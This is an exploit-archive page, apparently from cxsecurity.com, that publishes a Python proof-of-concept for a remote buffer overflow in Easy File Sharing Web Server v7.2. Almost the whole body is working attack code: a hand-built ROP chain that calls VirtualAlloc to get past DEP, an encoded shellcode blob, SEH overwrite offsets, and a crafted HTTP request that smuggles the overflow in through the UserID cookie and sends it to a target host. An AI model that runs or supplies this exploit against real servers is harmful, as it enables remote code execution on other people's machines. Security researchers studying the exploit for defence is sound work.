Easy File Sharing Web Server v7.2 Buffer Overflow

2026.04.14
Credit: Donwor
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-119

# Exploit title: Easy File Sharing Web Server v7.2 - Buffer Overflow # Date: 16/10/2025 # Exploit Author: Donwor # X: @real_Donwor # Discord: Donwor # Website: https://github.com/D0nw0r # Software Link: https://www.exploit-db.com/apps/60f3ff1f3cd34dec80fba130ea481f31-efssetup.exe # Version: Easy File Sharing Web Server v7.2 # Tested on: Windows 10,11 # # Notes: # - I wanted to re-do other PoCs because I did not want to use mona rop chain, so instead I built my own for practice and I believe it can help others. # - The ROP chain was VERY challenging to build, mainly because there were a lot of limimitations when moving data between for example EAX and ESI # - based on DEP SEH buffer overflow exploit by Knaps (https://www.exploit-db.com/exploits/38829/) # - bad chars: '\x00' and '\x3b' import struct, sys, socket host = sys.argv[1] port = 80 size = 5000 rop = struct.pack("<I", 0x1001ba81) # # MOV EAX,EBP # POP EDI # POP ESI # POP EBP # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ} rop += struct.pack("<I", 0x41414141) # junk for pop edi rop += struct.pack("<I", 0x41414141) # junk for pop edi rop += struct.pack("<I", 0x41414141) # junk for ebp rop += struct.pack("<I", 0x1001db66) # : # POP ESI # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ} rop += struct.pack("<I", 0xffffeff8) # pop esi to align eax, will point after the hybjks rop += struct.pack("<I", 0x10022f45) # # SUB EAX,ESI # POP EDI # POP ESI # RETN ** [ImageLoad.dll] ** | ascii {PAGE_EXECUTE_READ} rop += struct.pack("<I", 0x41414141) # # SUB EAX,ESI # POP EDI # POP ESI # RETN ** [ImageLoad.dll] ** | ascii {PAGE_EXECUTE_READ} rop += struct.pack("<I", 0x41414141) # # SUB EAX,ESI # POP EDI # POP ESI # RETN ** [ImageLoad.dll] ** | ascii {PAGE_EXECUTE_READ} rop += struct.pack("<L", 0x61c0a798) # XCHG EAX,EDI # RETN ) rop += struct.pack("<L", 0x1001d626) # : # XOR ESI,ESI # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ} rop += struct.pack("<L", 0x10021a3e) # (RVA : 0x00021a3e) : # ADD ESI,EDI # RETN 0x00 ** [ImageLoad.dll] ** | ascii {PAGE_EXECUTE_READ} ## Save ESP on ESI and EDI rop += struct.pack("<L", 0x10015442) # : # POP EAX # RETN rop += struct.pack("<L", 0x1004D1FC) # VirtualAlloc Addr on IAT rop += struct.pack("<L", 0x1002248c) # deref VirtualAlloc : # MOV EAX,DWORD PTR [EAX] # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ} rop += struct.pack("<L", 0x1001a8e3) # put virtualalloc addr on stack # MOV DWORD PTR [ESI],EAX # OR EAX,0FFFFFFFF # POP ESI # POP EBX # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ} rop += struct.pack("<L", 0x41414141) # junk pop esi rop += struct.pack("<L", 0x41414141) # junk pop ebx rop += struct.pack("<L", 0x1001d626) # prepare esi for another round XOR ESI,ESI # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ} rop += struct.pack("<L", 0x10021a3e) # put original stack pointer in esi(RVA : 0x00021a3e) : # ADD ESI,EDI # RETN 0x00 ** [ImageLoad.dll] ** | ascii {PAGE_EXECUTE_READ} rop += struct.pack("<L", 0x1001715d) # increase esi to point 4 bytes more (next arg) (RVA : 0x0001715d) : # INC ESI # ADD AL,3A # RETN ** [ImageLoad.dll] ** | ascii {PAGE_EXECUTE_READ} rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # # Virtual Alloc on stack # Esi now has "SRP" we need to fill it # EDI still points to orignal one (Virtual alloc) rop += struct.pack("<L", 0x1001f595) # Put SRP addr on eax MOV EAX,ESI # POP ESI # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ} rop += struct.pack("<L", 0x41414141) # junk pop esi rop += struct.pack("<L", 0x10019457) # ADD EAX,20 # RETN rop += struct.pack("<L", 0x10019457) # ADD EAX,20 # RETN rop += struct.pack("<L", 0x10019457) # ADD EAX,20 # RETN rop += struct.pack("<L", 0x10019457) # ADD EAX,20 # RETN rop += struct.pack("<L", 0x10019457) # ADD EAX,20 # RETN rop += struct.pack("<L", 0x10019457) # ADD EAX,20 # RETN rop += struct.pack("<L", 0x10019457) # ADD EAX,20 # RETN rop += struct.pack("<L", 0x10019457) # ADD EAX,20 # RETN rop += struct.pack("<L", 0x10019457) # ADD EAX,20 # RETN rop += struct.pack("<L", 0x10019457) # ADD EAX,20 # RETN rop += struct.pack("<L", 0x10019457) # ADD EAX,20 # RETN rop += struct.pack("<L", 0x10019457) # ADD EAX,20 # RETN rop += struct.pack("<L", 0x10019457) # ADD EAX,20 # RETN rop += struct.pack("<L", 0x10019457) # eax now points to x more (can be changed) rop += struct.pack("<L", 0x1001d626) # prepare esi for another round XOR ESI,ESI # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ} rop += struct.pack("<L", 0x10021a3e) # put original stack pointer in esi # ADD ESI,EDI # RETN 0x00 ** [ImageLoad.dll] ** | ascii {PAGE_EXECUTE_READ} rop += struct.pack("<L", 0x1001e80b) # This immedeately patches SRP and VirtualAlloc 1st arg! MOV DWORD PTR [ESI+8],EAX # MOV DWORD PTR [ESI+4],EAX # POP ESI # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ} rop += struct.pack("<L", 0x41414141) # junk pop esi # Virtual alloc | SRP | Shellcode Addr # edi -> virtualalloc rop += struct.pack("<L", 0x1001d626) # prepare esi for another round XOR ESI,ESI # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ} rop += struct.pack("<L", 0x10021a3e) # put original stack pointer in esi # ADD ESI,EDI # RETN 0x00 ** [ImageLoad.dll] ** | ascii {PAGE_EXECUTE_READ} rop += struct.pack("<L", 0x1001715d) # increase esi to point 12 bytes more (->dwsize) # INC ESI # ADD AL,3A # RETN ** [ImageLoad.dll] ** | ascii {PAGE_EXECUTE_READ} rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001c15d) # XOR EAX,EAX # RETN) # rop += struct.pack("<L", 0x10015442) # : # POP EAX # RETN rop += struct.pack("<L", 0xffffffff) # -1 rop += struct.pack("<L", 0x100231d1) # will turn eax into 1, second arg of virtualalloc NEG EAX # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ}) # rop += struct.pack("<L", 0x1001a8e3) # patch arg # MOV DWORD PTR [ESI],EAX # OR EAX,0FFFFFFFF # POP ESI # POP EBX # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ} rop += struct.pack("<L", 0x41414141) # junk pop esi rop += struct.pack("<L", 0x41414141) # junk pop ebx #VirtualAlloc | SRP | ShellcodeAddr | dwSize # edi -> virtualalloc rop += struct.pack("<L", 0x1001d626) # prepare esi for another round XOR ESI,ESI # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ} rop += struct.pack("<L", 0x10021a3e) # put original stack pointer in esi # ADD ESI,EDI # RETN 0x00 ** [ImageLoad.dll] ** | ascii {PAGE_EXECUTE_READ} rop += struct.pack("<L", 0x1001715d) # increase esi to point 16 bytes more (->flAllocation Type) # INC ESI # ADD AL,3A # RETN ** [ImageLoad.dll] ** | ascii {PAGE_EXECUTE_READ} rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x10015442) # : # POP EAX # RETN rop += struct.pack("<I", 0xffffefff) # value to pop eax now rop += struct.pack("<L", 0x100231d1) # will turn eax into 1002 NEG EAX # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ}) # rop += struct.pack("<I", 0x1001b7ca)# eax now 1000 # DEC EAX # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ} rop += struct.pack("<L", 0x1001a8e3) # patch arg # MOV DWORD PTR [ESI],EAX # OR EAX,0FFFFFFFF # POP ESI # POP EBX # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ} rop += struct.pack("<L", 0x41414141) # junk pop esi rop += struct.pack("<L", 0x41414141) # junk pop ebx #VirtualAlloc | SRP | ShellcodeAddr | dwSize | flAllocationType # edi -> virtualalloc rop += struct.pack("<L", 0x1001d626) # prepare esi for another round XOR ESI,ESI # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ} rop += struct.pack("<L", 0x10021a3e) # put original stack pointer in esi # ADD ESI,EDI # RETN 0x00 ** [ImageLoad.dll] ** | ascii {PAGE_EXECUTE_READ} rop += struct.pack("<L", 0x1001715d) # increase esi to point 20 bytes more (->flProtect Type) # INC ESI # ADD AL,3A # RETN ** [ImageLoad.dll] ** | ascii {PAGE_EXECUTE_READ} rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x10015442) # : # POP EAX # RETN rop += struct.pack("<I", 0xffffffbf) # : -41 rop += struct.pack("<L", 0x100231d1) # will turn eax into 41 NEG EAX # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ}) # rop += struct.pack("<I", 0x1001b7ca)# eax now 40 # DEC EAX # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ} rop += struct.pack("<L", 0x1001a8e3) # patch arg # MOV DWORD PTR [ESI],EAX # OR EAX,0FFFFFFFF # POP ESI # POP EBX # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ} rop += struct.pack("<L", 0x41414141) # junk pop esi rop += struct.pack("<L", 0x41414141) # junk pop ebx #VirtualAlloc | SRP | ShellcodeAddr | dwSize | flAllocationType | flProtect # edi -> virtualalloc rop += struct.pack("<L", 0x61c0a798) # # XCHG EAX,EDI # RETN rop += struct.pack("<L", 0x61c07ff8) # XCHG EAX,ESP # RETN # Just switch execution now, move the stack pointer to EDI (VirtualAlloc) sc = b"" sc += b"\x81\xc4\x24\xfa\xff\xff" # add esp , -1500 sc += b"\xbd\x04\xae\x2a\x98\xdb\xce\xd9\x74\x24\xf4\x5b" sc += b"\x31\xc9\xb1\x5e\x83\xeb\xfc\x31\x6b\x11\x03\x6b" sc += b"\x11\xe2\xf1\x52\xc2\x17\xf9\xaa\x13\x48\xc8\x78" sc += b"\x9a\x6d\x4e\xf6\xcf\x5d\x05\x5a\xfc\x16\x4b\x4f" sc += b"\x77\x5a\x43\x60\x30\xd1\xb5\x4f\xc1\xd7\x79\x03" sc += b"\x01\x79\x05\x5e\x56\x59\x34\x91\xab\x98\x71\x67" sc += b"\xc1\x75\x2f\xf3\x7b\x9a\x44\x41\x40\xcd\x5b\x96" sc += b"\x33\xb1\x23\x93\x84\x46\x9f\x9a\xd4\xf7\x94\xc5" sc += b"\xf4\x7c\xe2\xed\xf5\x51\x77\xc4\x82\x69\x3e\xe6" sc += b"\x95\x19\xf4\x83\x6b\xc8\xc5\x53\xc7\x35\xea\x59" sc += b"\x19\x71\xcc\x81\x6c\x89\x2f\x3f\x77\x4a\x52\x9b" sc += b"\xf2\x4d\xf4\x68\xa4\xa9\x05\xbc\x33\x39\x09\x09" sc += b"\x37\x65\x0d\x8c\x94\x1d\x29\x05\x1b\xf2\xb8\x5d" sc += b"\x38\xd6\xe1\x06\x21\x4f\x4f\xe8\x5e\x8f\x37\x55" sc += b"\xfb\xdb\xd5\x80\x7b\x24\x26\xad\x21\xb3\xeb\x60" sc += b"\xda\x43\x63\xf2\xa9\x71\x2c\xa8\x25\x3a\xa5\x76" sc += b"\xb1\x4b\xa1\x88\x6d\xf3\xa1\x76\x8e\x04\xe8\xbc" sc += b"\xda\x54\x82\x15\x63\x3f\x52\x99\xb6\xaa\x58\x0d" sc += b"\xf9\x83\x64\xc7\x91\xd1\x94\xd6\xda\x5f\x72\x88" sc += b"\x4c\x30\x2a\x69\x3d\xf0\x9a\x01\x57\xff\xc5\x32" sc += b"\x58\xd5\x6e\xd8\xb7\x80\xc7\x75\x21\x89\x93\xe4" sc += b"\xae\x07\xde\x27\x24\xa2\x1f\xe9\xcd\xc7\x33\x1e" sc += b"\xaa\x27\xcb\xdf\x5f\x28\xa1\xdb\xc9\x7f\x5d\xe6" sc += b"\x2c\xb7\xc2\x19\x1b\xcb\x04\xe5\xda\xfa\x7f\xd0" sc += b"\x48\x43\x17\x1d\x9d\x43\xe7\x4b\xf7\x43\x8f\x2b" sc += b"\xa3\x17\xaa\x33\x7e\x04\x67\xa6\x81\x7d\xd4\x61" sc += b"\xea\x83\x03\x45\xb5\x7c\x66\xd5\xb2\x83\xf5\xf2" sc += b"\x1a\xec\x05\x43\x9b\xec\x6f\x43\xcb\x84\x64\x6c" sc += b"\xe4\x64\x85\xa7\xad\xec\x0c\x26\x1f\x8c\x11\x63" sc += b"\xc1\x10\x12\x80\xda\xa3\x69\xe9\xdd\x43\x8e\xe3" sc += b"\xb9\x43\x8f\x0b\xbc\x78\x46\x32\xca\xbf\x5b\x01" sc += b"\xd5\x5d\x71\x7c\x7e\xf8\x10\x3d\xe3\xfb\xcf\x02" sc += b"\x1a\x78\xe5\xfa\xd9\x60\x8c\xff\xa6\x26\x7d\x72" sc += b"\xb6\xc2\x81\x21\xb7\xc6" padding = b"\x45" * 4 # 4 bytes of padding because of the alignment, the add eax,20 instructions will make it so stack points 4 bytes after rop += padding rop += sc rop += b"\x42" * (1244 - len(rop)) nseh = struct.pack("<I", 0x43434343) seh = struct.pack("<I", 0x10022877) # add esp, 1004; ret eax_offset = 4183 buf = b"A" * 2811 # rop chain start after add esp 1004 buf += rop buf += b"A" * (4059 - len(buf)) #nseh buf += nseh + seh buf += b"A" * (eax_offset - len(buf)) buf += struct.pack("<I", 0xffffffff) #" #make sure eax always trigger exception buf += b"A" * (size - len(buf)) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host ,port)) httpreq = ( b"GET /changeuser.ghp HTTP/1.1\r\n" b"User-Agent: Mozilla/4.0\r\n" b"Host:" + host.encode() + b":" + str(port).encode() + b"\r\n" b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" b"Accept-Language: en-us\r\n" b"Accept-Encoding: gzip, deflate\r\n" b"Referer: http://" + host.encode() + b"/\r\n" b"Cookie: SESSIONID=6771; UserID=" + buf + b"; PassWD=;\r\n" b"Conection: Keep-Alive\r\n\r\n" ) # Send payload to the server try: if len(sys.argv) < 2: print("[!] Usage: python3 exploit.py <IP of Server>") sys.exit(1) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) s.send(httpreq) s.close() print("[+] Packet sent!") except: print("[!] Could not connect to server / Exploit failed") sys.exit(1) sys.exit(0)


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2026, cxsecurity.com

 

Back to Top